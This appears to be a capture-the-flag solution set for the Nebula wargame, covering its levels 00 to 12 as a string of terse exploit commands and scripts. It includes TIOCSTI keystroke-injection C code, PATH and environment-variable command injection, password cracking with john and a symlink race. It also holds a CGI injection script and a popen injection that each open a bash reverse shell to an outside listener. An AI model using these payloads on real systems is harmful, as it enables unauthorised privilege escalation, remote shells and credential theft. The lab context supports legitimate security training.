https://exploit-exercises.com/nebula/
$ find / -perm -4000 -user flag00 2> /dev/null
$ echo -e '#!/bin/bash\n/bin/sh -c getflag' > ./echo; chmod +x ./echo; PATH=./:"$PATH" /home/flag01/flag01
$ USER='`/bin/sh -c getflag`' /home/flag02/flag02
#!/bin/bash
echo 'getflag > output2' > /home/flag03/writable.d/mz
echo 'Please wait while cron execute your command ...'
while [ ! -f /home/flag03/output2 ]; do sleep 1; done
cat /home/flag03/output2
My comments:
# this won't work (cause su won't take password from stdin)
# echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | su -
# this also won't work on Ubuntu (why?)
# echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | sudo -u flag04 -S -s getflag
# so to automate it I had to use trick that I've learned from http://vladz.devzero.fr/002_su-stdin.php
My solution:
$ echo -e '#include <stdio.h>\n #include <sys/ioctl.h>\n #include <string.h>\n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i<strlen(c); ++i) ioctl(0,TIOCSTI,c+i);}' | gcc -xc -; (sleep 1; ./a.out `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk`) & su flag04 -c getflag -
$ cp /home/flag05/.backup/backup-19072011.tgz a.tgz;tar xzf a.tgz; ssh flag05@localhost getflag; rm a.tgz
(remote exploit)
This time one need to run it from external machine (not nebula machine) and provide IP address of nebula machine in IP variable (for me it is 192.168.1.236).
My notes:
IP=$1
read -r -d '' SRC <<-'EOF'
#include <stdio.h>
#include <sys/ioctl.h>
#include <string.h>
main(int argc, char *argv[])
{
char c[512];
int i;
sprintf(c, "%s\n", argv[1]);
for(i=0; i<strlen(c); ++i)
ioctl(0,TIOCSTI,c+i);
return 0;
}
EOF
echo "$SRC" | gcc -xc -
eval { sleep 1; ./a.out user1; } & su user1
#& scp level06@${IP}:/etc/passwd ./
Solution:
$ IP=192.168.1.236; echo -e '#include <stdio.h>\n #include <sys/ioctl.h>\n #include <string.h>\n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i<strlen(c); ++i) ioctl(0,TIOCSTI,c+i);}' | gcc -xc -; (sleep 1; ./a.out level06;) & scp level06@$IP:/etc/passwd ./; (sleep 1; ./a.out `john ./passwd --show | awk -F: '{print $2}'`;) & ssh flag06@$IP
(remote exploit)
#!/bin/bash
# exploit usage: launch exploit from external machine as $1 provide IP to nebula machine
# standard payload to do the level (boring)
PAYLOAD=getflag
# more interesting approch (gives you reverse shell)
IP=$1
REVERSE_IP=$2
REVERSE_PORT=$3
#bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
PAYLOAD2=bash%20%2Di%20%3E%26%20/dev/tcp/${REVERSE_IP}/${REVERSE_PORT}%200%3E%261
if [ -z "$1" ]
then
echo "Usage: `basename $0` <nebula-machine-ip-address> <reverse-ip> <reverse-port>"
exit 1
fi
(sleep 1; curl http://${IP}:7007/index.cgi?Host=localhost%3B"${PAYLOAD2}") &
nc -l -p 2222 -vvv
# hex representation of "follow TCP stream" option on first (and only) stream in tshark:
$ tshark -z follow,tcp,hex,0 -r capture.pcap
# we see interesting string where dots are 0x7f (DELETE in ASCII):
backdoor...00Rm8.ate
# when we will treat dots as DELETEs (backspaces) we will get the password (we can simulate backspaces with '\b' with echo command):
$ echo -e "backdoor\b\b\b00Rm8\bate"
backd00Rmate
$ su flag08
classic TOCTOU problem:
# listen for "file uploads":
$ while [ 1 ]; do nc -l 18211; done
# prepare symlink which alternately links to 'fileToWhichIHaveAccess' and to 'token' files:
$ echo 'fileToWhichIHaveAccess' > /home/level10/fileToWhichIHaveAccess
$ while [ 1 ]; do ln -sf /home/level10/fileToWhichIHaveAccess /tmp/lnk; ln -sf /home/flag10/token /tmp/lnk; rm /tmp/lnk; done
# execute vulnerable binary:
while [ 1 ]; do ./flag10 /tmp/lnk 127.0.0.1; done
Vuln:
Lack of input data validation of popen() parameter:
prog = io.popen("echo "..password.." | sha1sum", "r")
One can simply inject os command (reverse shell for example):
192.168.8.100$ nc -l -p 2222
victim$ echo "; bash -i >& /dev/tcp/192.168.8.100/2222 0>&1" | nc 127.0.0.1 50001